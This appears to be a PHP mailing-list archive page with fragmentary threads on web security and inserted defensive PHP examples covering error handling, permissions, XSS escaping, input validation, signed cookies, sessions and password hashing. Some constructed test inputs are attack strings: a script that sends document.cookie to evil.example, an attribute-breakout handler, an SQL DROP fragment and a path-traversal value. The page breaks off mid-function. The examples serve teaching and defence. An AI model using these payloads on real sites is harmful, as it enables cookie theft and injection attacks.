At 2:53 PM -0500 4/8/11, Jay Blanchard wrote:
[snip]
whats the best way to learn about security in php?
[/snip]
Study, study, study!
Chris Shiflett is a recognized expert on PHP security -
http://shiflett.org/
He has a great book on PHP Security -
http://www.amazon.com/exec/obidos/ASIN/059600656X/ref=nosim/chrisshiflett-20
hey guys/girls,
whats the best way to learn about security in php?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Best way to learn about security of something is to learn how to break it...
On Apr 8, 2011 3:55 PM, Jay Blanchard jblanch...@pocket.com wrote:
On Fri, Apr 8, 2011 at 3:24 PM, nighthawk1256 er...@ns.sympatico.ca wrote:
hey guys/girls,
whats the best way to learn about security in php?
Here are some relevant topics to consider:
- Validate input (only accept what you're expecting, via GET, POST, and
COOKIE, and don't try to fix
On Tue, Aug 25, 2009 at 00:07, Augusto Flavio afla...@gmail.com wrote:
Answers: (choose 2)
Error messages will contain sensitive session information
Error messages can contain cross site scripting attacks
Security risks involved in logging are handled by PHP
X Error messages give
Hi all,
I'm discussing this question with my friend for 30 min and I do not
agree with him. Here is the question:
Why is it important from a security perspective to never display PHP error
messages directly to the end user, yet always log them?
Answers: (choose 2)
Error messages
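Added example (editor's code, not from the thread): the configuration the quiz question is about, plus a handler that logs the full error server-side and gives the user only an opaque reference. The log path and the reference scheme are assumptions; on a real host put the log outside the document root.

```php
<?php
// Added example, not from the thread. Detailed errors go to the log only;
// the browser gets a generic message and a reference id to quote to support.
declare(strict_types=1);

ini_set('display_errors', '0');                              // never echo PHP errors to the client
ini_set('log_errors', '1');                                  // but always record them
ini_set('error_log', sys_get_temp_dir() . '/app-error.log'); // assumed path; use one outside the docroot
error_reporting(E_ALL);

/** Write the detail to the log and return a short reference that carries no internal detail. */
function report_failure(string $detail): string
{
    $ref = bin2hex(random_bytes(6));            // 12 hex chars, unguessable
    error_log(sprintf('[%s] %s', $ref, $detail));
    return $ref;
}

/** Fail closed: generic text only, no file names, paths, SQL or hostnames. */
function fail_closed(string $ref): void
{
    http_response_code(500);
    echo 'Something went wrong. Please quote reference '
        . htmlspecialchars($ref, ENT_QUOTES, 'UTF-8') . "\n";
    exit;
}

// Every PHP error and every uncaught exception takes the same path.
set_error_handler(function (int $no, string $str, string $file, int $line) {
    fail_closed(report_failure("PHP error $no: $str in $file:$line"));
});
set_exception_handler(function (Throwable $e): void {
    fail_closed(report_failure(get_class($e) . ': ' . $e->getMessage()
        . ' in ' . $e->getFile() . ':' . $e->getLine()));
});

// Demonstration: a message naming an internal host and a table stays in the log.
throw new RuntimeException(
    'SQLSTATE[HY000] connection to db-internal.example:3306 refused (table users)'
);
```

This handler treats every error as fatal, which is the conservative choice for an admin interface; a site that wants to keep serving on E_NOTICE can log and return true for low severities instead of calling fail_closed(). The reference id is the link between what the user saw and the log line, without putting the log line on the page.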
VamVan vamsee...@gmail.com wrote in message
news:12eb8b030901141421u6741b943q396bc784136b7...@mail.gmail.com...
On Wed, Jan 14, 2009 at 2:22 PM, Frank Stanovcak
blindspot...@comcast.net wrote:
This is mostly to make sure I understand how sessions are handled correctly.
As far as sessions are concerned the variable data is stored on the server
(be it in memory or temp files), and never transmitted across the net
unless output to the page? So this means I should be able to store the
Andrew Peterson wrote:
Does anyone know a good way to protect a directory that a php script NEEDS
to write to?
What I'm doing now:
1. create a directory manually myDir
2. chmod 777 myDir
3. password protect the directory with htaccess
Is this the best way, or is there something better?
Also, is there a way to mkdir
You could chmod the
My pleasure, Arno!
On 5/22/07, Arno Kuhl [EMAIL PROTECTED] wrote:
-Original Message-
From: Daniel Brown [mailto:[EMAIL PROTECTED]
Sent: 18 May 2007 10:27
To: Al
Cc: php-general@lists.php.net
Subject: Re: [PHP] Security Question, re directory permissions [long
answer]
On 5/18/07
On 5/19/07, itoctopus [EMAIL PROTECTED] wrote:
I'm genuinely interested to know with whom you're hosting...
No problem, it's www.dapx.com, it hasn't a lot of security, safe_mode is
off for example.
If you know the right stuff from another user on the same server, you
can actually do some nice
I use Hosting Matters. It is super reliable and solid.
itoctopus wrote:
I'm genuinely interested to know with whom you're hosting...
I'm on a shared Linux host and have been wondering about security and directory other
[world] permissions.
The defaults are 755. The 'others' [world] can read them only.
Is there a security hole if a directory on the doc root has
permissions 757?
If there is a security problem, what
How can they write or edit files there without having ftp access or the site's
file manager?
On 5/18/07, Al [EMAIL PROTECTED] wrote:
How can they write or edit files there without having ftp access or the site's
file manager?
SSH access? Telnet maybe? PHP script? CGI script? ASP script?
There are a lot of possible ways someone can write there.
Tijnema
But, SSH and telnet, etc. require authentication log-in and all the executables you mentioned [and others] require
someone who has access to upload a harmful file to start with. Right? Once they are in there, they can do anything they
please anyhow.
Al.
How can anyone, other than the staff, get into my site? Far as I know, other users can't get out of their own domain
space and into mine.
On Fri, 2007-05-18 at 20:16 -0400, Al wrote:
How can anyone, other than the staff, get into my site? Far as I know, other
users can't get out of their own domain
space and into mine.
Bugs in your code, bugs in third-party code, bugs in PHP itself,
sometimes they can be abused to take
On 5/19/07, Al [EMAIL PROTECTED] wrote:
How can anyone, other than the staff, get into my site? Far as I know, other
users can't get out of their own domain
space and into mine.
That's quite easy, especially when you have SSH access.
Of course, it will only work with specific settings, and
I guess your comment "The less secure everything else is." is the best
answer.
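Added example (editor's code, not from either thread) for the two directory questions above: the one asking how to protect a directory a script must write to without chmod 777, and the one asking whether a 757 directory under the docroot is a hole. The first helper creates the directory owner-only and, if it has to live inside the docroot, drops an .htaccess that refuses direct requests; the second walks a tree and lists everything that "others" (on a shared host, every other customer) can write to. Paths are assumptions, and the .htaccess only takes effect where AllowOverride permits it.

```php
<?php
// Added example, not from the thread. Paths and the scratch tree are constructed.
declare(strict_types=1);

/**
 * Create $dir with mode 0700: only the account PHP runs as can read or write it.
 * Outside the docroot it is unreachable over HTTP anyway; inside, the .htaccess
 * tells Apache 2.4 to refuse requests (Apache 2.2 needs "Order deny,allow" /
 * "Deny from all" instead).
 */
function make_private_dir(string $dir, bool $insideDocroot = false): void
{
    if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
        throw new RuntimeException("cannot create $dir");
    }
    chmod($dir, 0700);                       // mkdir() is filtered by umask; set the mode explicitly
    if ($insideDocroot) {
        file_put_contents($dir . '/.htaccess', "Require all denied\n");
        chmod($dir . '/.htaccess', 0600);
    }
}

/** Every file or directory under $root whose mode grants write to "others" (the 0002 bit). */
function find_world_writable(string $root): array
{
    $found = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $path => $info) {
        if (($info->getPerms() & 0002) !== 0) {
            $found[] = sprintf('%o %s', $info->getPerms() & 0777, $path);
        }
    }
    return $found;
}

// Demonstration on a constructed scratch tree in the temp directory.
$root = sys_get_temp_dir() . '/permdemo-' . getmypid();
mkdir($root, 0755, true);
mkdir($root . '/uploads', 0757);
chmod($root . '/uploads', 0757);             // the questionable 757 directory
make_private_dir($root . '/private');        // the recommended alternative

foreach (find_world_writable($root) as $hit) {
    echo "world-writable: $hit\n";           // reports uploads, not private
}

rmdir($root . '/private');
rmdir($root . '/uploads');
rmdir($root);
```

The audit is the answer to "how can they write there": any process running under another account on the same box, including another customer's PHP or CGI script, can write into a directory with the 0002 bit set, no FTP login required. On a host where every site's PHP runs as the same www user, 0700 still does not separate you from the other sites; only a per-user PHP setup (suexec, FPM pools) does.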
I'm developing a CMS where logged-in, selected users can create new directories and pages in them. I'm comfortable that
my code is secure. I'm using php's ftp functions, with good security, to mkdir and create
I'm genuinely interested to know with whom you're hosting...
--
itoctopus - http://www.itoctopus.com
Here is part of my proxie tags to html tags translation array. Looks pretty safe
to me. There is other code to recognize paragraphs and lists, etc.
$translate_array = array(
'link' => '<a href="http://',
'/link' => '</a>',
'slink' => '<a href="https://',
'/slink' =>
Al wrote:
Here is part of my proxie tags to html tags translation array. Looks
pretty safe to me. There is other code to recognize paragraphs and
lists, etc.
any 'real' html in the content you're 'translating' is still going to
be there after translation - and therefore sent to the client,
quite
I've got a website on a virtual-host, Apache/Linux system running php scripts.
In particular, I've designed a CMS where designated individuals compose and edit
text in an html textarea, and then save the raw text in files. Custom [i.e.,
proxie] tags are used for emphasizing and the formatting
Good point about the '<script>evil haxor code here;</script>'. That's bad for
our users, not the site, per se.
Raw text to html is primarily done with a series of preg_replace() operations.
No include() or exec() allowed near the text.
Sounds like I'm in pretty good shape.
Thanks for the
Al wrote:
Good point about the '<script>evil haxor code here;</script>'. That's
bad for our users, not the site, per se.
what is bad for your users is bad for your site, on top of that
the script is running in the context of your domain - all sorts of
nasty possibilities that could affect your
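Added example (editor's code, not the poster's CMS): the proxy-tag translation from the thread in two forms. The first rewrites only the proxy tags and leaves everything else alone, which is what the replies above warn about; the second escapes the whole text first and only then turns whitelisted tags into HTML, so author-supplied <script> and attribute breakouts arrive at the browser as text. The [link]...[/link] and [b] bracket syntax and the allowed link-target characters are assumptions.

```php
<?php
// Added example, not from the thread. Input below is constructed.
declare(strict_types=1);

// As described in the thread: proxy tags become HTML, everything else passes through.
function translate_unsafe(string $text): string
{
    $html = strtr($text, ['[b]' => '<b>', '[/b]' => '</b>']);
    return preg_replace('~\[link\]([^\[]+)\[/link\]~', '<a href="http://$1">$1</a>', $html);
}

// Hardened: escape first, translate second. htmlspecialchars() leaves square
// brackets alone, so the proxy tags survive, while < > " ' & do not. The link
// target is additionally restricted to plain host/path characters, so neither
// a quote nor a javascript: scheme can reach the attribute.
function translate_safe(string $text): string
{
    $safe = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    $safe = preg_replace_callback(
        '~\[link\]([^\[]+)\[/link\]~',
        function (array $m): string {
            if (!preg_match('~^[A-Za-z0-9./_-]+$~', $m[1])) {
                return $m[1];                // not a usable target: keep the escaped text, make no link
            }
            return '<a href="http://' . $m[1] . '">' . $m[1] . '</a>';
        },
        $safe
    );
    return strtr($safe, ['[b]' => '<b>', '[/b]' => '</b>']);
}

// Constructed author input: a legitimate link, an attribute breakout in a link
// target, and a raw script tag.
$input = 'See [link]example.com/page[/link] and [link]x" onmouseover="alert(1)[/link] '
       . '<script>document.location="http://evil.example/?"+document.cookie</script>';

echo translate_unsafe($input), "\n";   // both the onmouseover handler and the script tag reach the browser
echo translate_safe($input), "\n";     // first link works; the other two are inert, escaped text
```

The escape-then-translate order is the whole trick: any HTML the author typed is already neutralised before the translator adds the only HTML the page wants. Doing it the other way round (translate, then escape) would also escape the generated tags.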
void session_set_cookie_params ( int lifetime [, string path [, string
domain [, bool secure [, bool httponly ]]]] )
The bool secure part of that means you can set your cookie
parameters such that your cookies are sent/received only over SSL
connections. Only available since PHP 4.0.4
On Thu,
Robert Cummings wrote:
On Thu, 2006-11-23 at 09:56 +0530, Sumeet wrote:
Western, Matthew wrote:
where did u learn all the stuff?... ;-)
Maybe reading the manual?
thanks matthew,
maybe we should all refer to forum and google
Teach a man to fish...
Cheers,
Rob.
Give a man a
There are a few ways of working you should adopt early as they protect
against a range of security problems. Some examples:
1. Always initialise your variables.
2. If you can, turn off register_globals, or code defensively if you can't.
3. Always mistrust incoming data, validate, check contents
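Added example (editor's code, not from the thread) for the three tips above and for the "only accept what you're expecting via GET, POST and COOKIE" advice earlier on the page. The first function reproduces the register_globals hazard with extract() on request data, which has the same effect and still exists; the second initialises everything and validates each input against a whitelist, falling back to a default rather than trying to fix bad values. Parameter names and the allowed values are assumptions.

```php
<?php
// Added example, not from the thread. Request arrays below are constructed.
declare(strict_types=1);

// Vulnerable: $is_admin is never initialised and extract() lets the client
// define it, exactly as register_globals=On did. ?is_admin=1 is enough.
function vulnerable_is_admin(array $request): bool
{
    extract($request);
    if (isset($is_admin) && $is_admin) {     // older code: plain "if ($is_admin)"
        return true;
    }
    return false;
}

// Hardened: every variable has a value before any input is looked at, nothing
// is imported wholesale, and each parameter must match what the page expects.
function validated_input(array $get, array $post, array $cookie): array
{
    $is_admin = false;                       // privilege comes from the server side, never from the request
    $page     = 1;
    $sort     = 'date';
    $lang     = 'en';

    if (isset($get['page']) && preg_match('/^[1-9][0-9]{0,3}$/', (string)$get['page'])) {
        $page = (int)$get['page'];
    }
    $allowedSort = ['date', 'title', 'author'];
    if (isset($post['sort']) && in_array($post['sort'], $allowedSort, true)) {
        $sort = $post['sort'];
    }
    // Cookies are client-controlled too: a bad value is dropped, not "fixed".
    if (isset($cookie['lang']) && preg_match('/^[a-z]{2}$/', (string)$cookie['lang'])) {
        $lang = $cookie['lang'];
    }
    return ['is_admin' => $is_admin, 'page' => $page, 'sort' => $sort, 'lang' => $lang];
}

// Constructed request data standing in for $_GET, $_POST and $_COOKIE.
$get    = ['page' => '7; DROP TABLE users', 'is_admin' => '1'];
$post   = ['sort' => 'title'];
$cookie = ['lang' => '../../etc/passwd'];

var_dump(vulnerable_is_admin($get));             // the client granted itself admin
print_r(validated_input($get, $post, $cookie));  // is_admin stays false; page and lang fall back to defaults
```

The whitelist style (a regex or a fixed list per parameter) is what "only accept what you're expecting" means in code. Blacklisting known-bad strings is the "try to fix it" approach the earlier reply advises against.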
On Wed, 2006-11-22 at 22:45 -0600, Larry Garfield wrote:
On Wednesday 22 November 2006 22:38, Robert Cummings wrote:
maybe we should all refer to forum and google
Teach a man to fish...
And you lose your monopoly on fisheries.
Yeah, but I got Park Place and Boardwalk!!! *nyah nyah*
Sorry didn't quite get that finished - hit send by accident ( and had
it go to one person, instead of to the list ).
Few quick tips - not all strictly security related, but may affect security.
Hi,
Now that i finished the client side of the web application i would like to
improve the security of my administration side of this web application.
My web hoster supports a shared SSL protocol, however i would like to do more
than simply use the SSL...
I've heard that cookies and sessions can
Alain Roger wrote:
I've heard that cookies and sessions can be easily hacked...so what do
you
use to secure your web page.
which methods ?
If you want to be secure, don't trust anything. Cookies are easily
modified by a user, so never store anything sensitive in there without
masking it
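Added example (editor's code, not from the thread): one way to "mask" a cookie value so the user can read it but not alter it, an HMAC over the payload checked with a constant-time compare, issued with the secure and httponly flags mentioned elsewhere on the page. The key, cookie name and payload are assumptions; the key is a server-side secret and must never be derived from anything the client sends.

```php
<?php
// Added example, not from the thread. Needs PHP 7.3+ for the setcookie() options array.
declare(strict_types=1);

const COOKIE_KEY = 'replace-with-32-random-bytes-from-random_bytes()';   // assumed server-side secret

/** payload.mac, where the MAC covers the exact bytes the client will send back. */
function sign_cookie_value(array $data, string $key): string
{
    $payload = base64_encode(json_encode($data, JSON_THROW_ON_ERROR));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

/** The data if the MAC checks out, null if the cookie was altered or forged. */
function verify_cookie_value(string $cookie, string $key): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) {   // constant-time comparison
        return null;
    }
    $decoded = base64_decode($payload, true);
    if ($decoded === false) {
        return null;
    }
    $data = json_decode($decoded, true);
    return is_array($data) ? $data : null;
}

// Issuing: flags keep the cookie off plain HTTP and away from page scripts.
$value = sign_cookie_value(['theme' => 'dark', 'uid' => 42], COOKIE_KEY);
setcookie('prefs', $value, [
    'expires'  => time() + 86400,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);

// Reading: the genuine value verifies; editing the visible payload breaks the MAC.
var_dump(verify_cookie_value($value, COOKIE_KEY));
[$payload, $mac] = explode('.', $value, 2);
$forged = base64_encode(json_encode(['theme' => 'dark', 'uid' => 1])) . '.' . $mac;
var_dump(verify_cookie_value($forged, COOKIE_KEY));
```

Signing is integrity, not secrecy: the payload is still readable by the user, so anything sensitive belongs in the session on the server with only the session id in the cookie. A signed cookie can also be replayed until it expires, which is why the expiry is part of the design rather than an afterthought.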
dear richard,
yours was an amazing reply... simple and true and well written...
where did u learn all the stuff?... ;-)
anyway. is there a step by step process for checking if your site is
secure?... i know you would say to get a hacker or something... but as a
programmer, i would like
Western, Matthew wrote:
where did u learn all the stuff?... ;-)
Maybe reading the manual?
thanks matthew,
maybe we should all refer to forum and google, and stop posting in this
forum can u please start first...
thanks anyway... man, I needed some silly sarcastic comments to get
On Thu, 2006-11-23 at 09:56 +0530, Sumeet wrote:
Western, Matthew wrote:
where did u learn all the stuff?... ;-)
Maybe reading the manual?
thanks matthew,
maybe we should all refer to forum and google
Teach a man to fish...
Cheers,
Rob.
--
On Wednesday 22 November 2006 22:38, Robert Cummings wrote:
maybe we should all refer to forum and google
Teach a man to fish...
And you lose your monopoly on fisheries.
--
Larry Garfield AIM: LOLG42
[EMAIL PROTECTED] ICQ: 6817012
If nature has made any one
Hi list
I've got a concern for a user add/edit form.
Right now when the user is logged in, I put its id in the session.
Then when the user edits his details I put the id in the form and when it
comes back I verify if the id matches the one in the session.
Is it possible for someone who does
Andy Pieters wrote:
Is it possible for someone who does not have access to the server to edit
arbitary accounts?
Well, this depends on the forum you use; there are many, many exploits out
there.
The best way to know is to try and keep up with places like
the bugtraq@securityfocus.com list,
On Wednesday 07 December 2005 08:57, Łukasz Hejnak wrote:
The best way to know is to try and keep up with places like
the bugtraq@securityfocus.com list, or other security websites/mailing
lists and such.
It isn't a forum, it is software I write myself.
--
Now listening to Top! Radio Live
Hi Andy,
On 12/7/05, Andy Pieters [EMAIL PROTECTED] wrote:
Right now when the user is logged in, I put its id in the session.
Then when the user edits his details I put the id in the form and when it
comes back I verify if the id matches the one in the session.
Well, is session data saved in
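Added example (editor's code, not from any message in these threads) tying together the session questions above: the data stays on the server and only the session id travels, in a cookie set with the secure and httponly parameters of session_set_cookie_params(); the logged-in user's id is taken from the session and never from a hidden form field, so the edit form cannot be pointed at another account; and the form carries a per-session token so a request forged from another site is rejected. The user table and login check are stand-ins; PHP 7.3+ is assumed for the array form of session_set_cookie_params().

```php
<?php
// Added example, not from the thread. The account table below is constructed.
declare(strict_types=1);

$USERS = [
    'alice' => ['id' => 7, 'hash' => password_hash('correct horse', PASSWORD_DEFAULT)],
];

function start_secure_session(): void
{
    ini_set('session.use_only_cookies', '1');   // ignore ?PHPSESSID= in the URL
    ini_set('session.use_strict_mode', '1');    // reject ids the server never issued
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,                     // the "bool secure" parameter: HTTPS only
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

function login(string $user, string $password, array $users): bool
{
    if (!isset($users[$user]) || !password_verify($password, $users[$user]['hash'])) {
        return false;
    }
    session_regenerate_id(true);                // fresh id after the privilege change: no fixation
    $_SESSION['uid']  = $users[$user]['id'];    // lives on the server, never sent to the client
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
    return true;
}

/** The edit form carries the token; the user id is deliberately not a field. */
function edit_form_html(): string
{
    $token = htmlspecialchars($_SESSION['csrf'], ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/edit.php">'
         . '<input type="hidden" name="csrf" value="' . $token . '">'
         . '<input type="text" name="email"><button>Save</button></form>';
}

/** Which account gets updated comes from the session, whatever the POST says. */
function handle_edit(array $post): string
{
    if (!isset($_SESSION['uid'])) {
        return 'not logged in';
    }
    if (!isset($post['csrf']) || !hash_equals($_SESSION['csrf'], (string)$post['csrf'])) {
        return 'request rejected';              // token missing or forged
    }
    $email = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return 'invalid e-mail';
    }
    // UPDATE users SET email = :email WHERE id = :uid, with :uid bound to $_SESSION['uid']
    return 'updated account ' . $_SESSION['uid'];
}

// Demonstration; in a real application each step is a separate request.
start_secure_session();
login('alice', 'correct horse', $USERS);
echo edit_form_html(), "\n";
echo handle_edit(['csrf' => $_SESSION['csrf'], 'email' => 'alice@example.com']), "\n";
echo handle_edit(['csrf' => 'guess', 'email' => 'evil@example.com', 'id' => '1']), "\n"; // extra "id" is ignored
```

Comparing a form-supplied id against the one in the session, as the question describes, is safe as long as the session value always wins; simply not reading the id from the form removes the comparison and the chance of getting it wrong.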
hey...
anybody here have a serious background in security, or with 'man in the
middle attacks'???
in particular, i'm trying to get my hands around ways of preventing a
server/browser app to be susceptible to a 'man in the middle attack'
serious pointers would be helpful. searching across google
-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]
Sent: Monday, November 21, 2005 8:34 PM
To: [EMAIL PROTECTED]
Subject: RE: [PHP] security question... man in the middle attacks
'man in the middle' relates to any interception/redirection and I see I was
looking at it more as a hacker posing
how many of you actually attempt to verify that the browser being used
by the client is indeed a legitimate (non-hacked) browser?
I think you need to clearly define what a legitimate browser is. In my
opinion, the ambiguity in your question is the root cause of the
disorganization in this
On 6/20/05, bruce [EMAIL PROTECTED] wrote:
hi...
a number of you write apache/web/server apps that deal with secure
information.. in doing some research it occurred to me that a potential weak
link is on the client side, regarding the browser? how many of you actually
attempt to verify that the browser being used by the client is indeed a
Hello all,
I have the following script called login.inc which I include at the
beginning of each page on my customer control panel. Basically it checks to
see if a session has been created with user details and if it has it carries
on with the rest of the page and if not the login screen is
Richard Lynch wrote:
Ian Gray wrote:
Hello all,
My question is, how secure is this? I have the password, username etc in a
MYSQL database but I haven't encrypted it (don't know how)
The MySQL 'password' function at http://mysql.com would work.
For something that is portable to non MySQL systems, you can use
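Added example (editor's code, not from the thread): the portable alternative to MySQL's PASSWORD() in its current form, PHP's own password_hash() and password_verify() (salted bcrypt by default, with a tunable work factor). Only the hash is stored; the lookup uses a prepared statement; an unknown username costs the same time as a wrong password; and old hashes are upgraded on the fly. The table layout is an assumption and SQLite stands in for MySQL.

```php
<?php
// Added example, not from the thread. Database and users below are constructed.
declare(strict_types=1);

const HASH_COST = 12;   // raise over the years as hardware gets faster

/** Called at registration or password change; the plaintext is never stored. */
function make_password_hash(string $plain): string
{
    return password_hash($plain, PASSWORD_DEFAULT, ['cost' => HASH_COST]);
}

/** Login check. False for a wrong password or an unknown user, taking the same time either way. */
function check_login(PDO $db, string $username, string $plain): bool
{
    static $dummy = null;
    $dummy ??= make_password_hash('dummy');       // a real hash to verify against when the user does not exist

    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false) {
        password_verify($plain, $dummy);          // spend the bcrypt time so timing does not reveal valid usernames
        return false;
    }
    if (!password_verify($plain, $row['password_hash'])) {
        return false;
    }
    if (password_needs_rehash($row['password_hash'], PASSWORD_DEFAULT, ['cost' => HASH_COST])) {
        $upd = $db->prepare('UPDATE users SET password_hash = :h WHERE username = :u');
        $upd->execute([':h' => make_password_hash($plain), ':u' => $username]);
    }
    return true;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)');
$ins->execute([':u' => 'ian', ':h' => make_password_hash('s3cret-passphrase')]);

var_dump(check_login($db, 'ian', 's3cret-passphrase'));   // correct password
var_dump(check_login($db, 'ian', 'wrong'));               // wrong password
var_dump(check_login($db, 'nobody', 'wrong'));            // unknown user
```

A fast hash (MD5, SHA-1, or MySQL's PASSWORD(), which is SHA-1 based) is the wrong tool here because an attacker with the table can try billions of guesses per second; the cost parameter is what makes each guess expensive.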
Hi folks. Thanks to all for the replies to my question about security
on shared hosting the other day.
I've contacted my hosting provider and they will be fixing the issues
I've pointed out to them.
I've got a question about a section of Chris's article on PHP security
from his OSCON 2004 talk.
Hi folks. Sorry if this gets posted twice, but I sent it originally
almost an hour ago and it hasn't shown up on the list yet.
Thanks to all for the replies to my question about security on shared
hosting the other day.
I've contacted my hosting provider and they will be fixing the issues
I've
--- Pablo Gosse [EMAIL PROTECTED] wrote:
I've got a question about a section of Chris's article on PHP
security from his OSCON 2004 talk.
When talking about protecting database credentials, Chris
mentions creating a file (readable only by root) with the
following:
SetEnv DB_USER myuser
On Friday 01 October 2004 00:59, Pablo Gosse wrote:
When talking about protecting database credentials, Chris mentions
creating a file (readable only by root) with the following:
SetEnv DB_USER myuser
SetEnv DB_PASS mypass
and then using this:
Include /path/to/secret-stuff
in the
On 20 February 2004 22:29, Ed Lazor wrote:
PHP include statements default to the current directory. If the path to
my PHP files is /home/osmosis/public_html, why would users visiting my
site occasionally get an error that the include file wasn't found in
/home/budguy/public_html?
It's like PHP is somehow confused and running my script
Ed Lazor mailto:[EMAIL PROTECTED]
on Friday, February 20, 2004 2:29 PM said:
It's like PHP is somehow confused and running my script with the
account settings (and permissions, possibly) for another user on my
host provider's server. If that's true, wouldn't this qualify as a
security
You're not being rude. I contacted them immediately about the script
errors and described what seemed to be a security hole. The tech I
spoke with didn't know what I was talking about, so I asked them to
notify the owner of the problem and that I'd research it more and let
them know of anything
On Thu, 18 Dec 2003 10:43:14 -0500, you wrote:
Hello,
I'm trying to develop a secure web based application and my only tools are
php, mysql, and a SSL connection.
Does anyone know of any good references for this kind of development?
What I really need to do is to make sure that given users only gain access
to the parts of the application
Can anyone think of any security caveats with regard to turning
output_buffering on?
I can't, but it's too hot to think straight these days
Tnx.
--
Paul Chvostek [EMAIL PROTECTED]
it.canada
Ananth Kesari [EMAIL PROTECTED] wrote... :
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell.
I know :)
We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and
Hi,
I am working on porting PHP onto NetWare.
At this point of time, I am trying to understand the way security is
implemented for PHP on Unix / Linux. I mean, how are the different users
distinguished from Unix / Linux. Do they get to login into the Unix /
Linux system? Do they have separate
Hi,
I mailed this earlier, but got no response. Maybe it went unnoticed.
So, resending it again. Please read below.
Your help in this is appreciated.
Thanks,
Ananth.
Hi,
I am working on porting PHP onto NetWare.
I am a newbie to Unix / Linux systems and at this point of time, I am
trying to
Ananth Kesari [EMAIL PROTECTED] wrote... :
I am working on porting PHP onto NetWare.
What exactly do you mean?
I am a newbie to Unix / Linux systems and at this point of time, I am
trying to understand the way security is implemented for PHP on Unix /
Linux. I mean, how are the different
Ananth,
For starters, you are probably on the wrong list - the PHP developers list
is probably where you should be asking this question.
Second, PHP runs through the web server, so the user is the same user as the
web server, usually nobody, although that depends on how the web
server is
--- Miles Thompson [EMAIL PROTECTED] wrote:
Ananth,
For starters, you are probably on the wrong list -
the PHP developers list is probably where you should
be asking this question.
Please do not go around saying this. We have enough
problems with these types of posts winding up on php-dev
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell. We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and we have synched up our
sources for the 4.3 branch.
Thanks,
Thanks for your inputs. Will proceed from here.
Well, I first posted this query on this list. But seeing no response, I
thought probably it should have gone into PHP-dev list. When I posted
there, I was discouraged to post such mails there. So, I came back to
the general list.
Thanks,
Ananth.
I want to give my users the ability to submit a URL to a database, then when
they pull up their page, their photo is included .. what I'm worried about
is them pointing the link to some malicious code or something..
Obviously I can validate the file extension (.gif or .jpg) .. and I'm going
to
I guess you use some webserver, let's take apache.
Apache's mime.conf has set several extensions,
also php extensions. So only .php, .php3, .php4
files will be parsed by php.
Chad Day wrote:
I want to give my users the ability to submit a URL to a database, then when
they pull up their page,
--- Chad Day [EMAIL PROTECTED] wrote:
I want to give my users the ability to submit a URL
to a database, then when they pull up their page,
their photo is included .. what I'm worried about
is them pointing the link to some malicious code or
something..
Your instincts serve you well.
There
On Wednesday 22 January 2003 01:40, Sean Burlington wrote:
is there really any site which will accept a book order based on a single
GET ?
Amazon makes a big deal of their one-click shopping feature. It's so good
they've even patented it.
--
Jason Wong - Gremlins Associates -
Gibbs, Liam - SXIA wrote:
I agree that there are risks - but I do think this can be done safely
Couldn't you just check the submitted URL and find out if it's a gif or
jpeg? I don't think even PHP-enabled servers will run a gif or jpeg.
please send replies to the list ...
and you cant
--- Sean Burlington [EMAIL PROTECTED] wrote:
I'm not sure what harm could be done by this though.
if a browser attempts to load an image referenced by
an img tag - but finds an unsuitable type of data -
I would expect it simply to ignore it...
I sent a response about this earlier, but you
--- Sean Burlington [EMAIL PROTECTED] wrote:
is there really any site which will accept a book
order based on a single GET?
Well, yes, but that is not the point really. The example of
the img tag is just one way you can forge an HTTP request
from another user (the victim).
Also consider that
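Added example (editor's code, not from the thread) for the user-submitted image URL question, built on the two points Chris makes: an extension check says nothing about what the URL actually returns, and an img tag pointing at a URL the user chose makes every viewer's browser send a request there. So the URL is validated, fetched once on the server with redirects disabled, checked by its bytes rather than its name, and stored locally; the page then embeds the local copy and never the submitted URL. Storage path, size limit and the accepted formats are assumptions; PHP 8 is assumed for str_starts_with().

```php
<?php
// Added example, not from the thread. The checked inputs at the bottom are constructed.
declare(strict_types=1);

/** Absolute http(s) URL, no embedded credentials, host resolving to a public address. */
function acceptable_image_url(string $url): bool
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return false;                            // no javascript:, data:, file:, ftp:
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return false;
    }
    $ip = gethostbyname($p['host']);             // the server-side fetch must not be aimed at localhost or the LAN
    if ($ip === $p['host'] && !filter_var($ip, FILTER_VALIDATE_IP)) {
        return false;                            // did not resolve
    }
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/** Image type from the leading bytes, or null if it is not one we serve. */
function sniff_image_type(string $bytes): ?string
{
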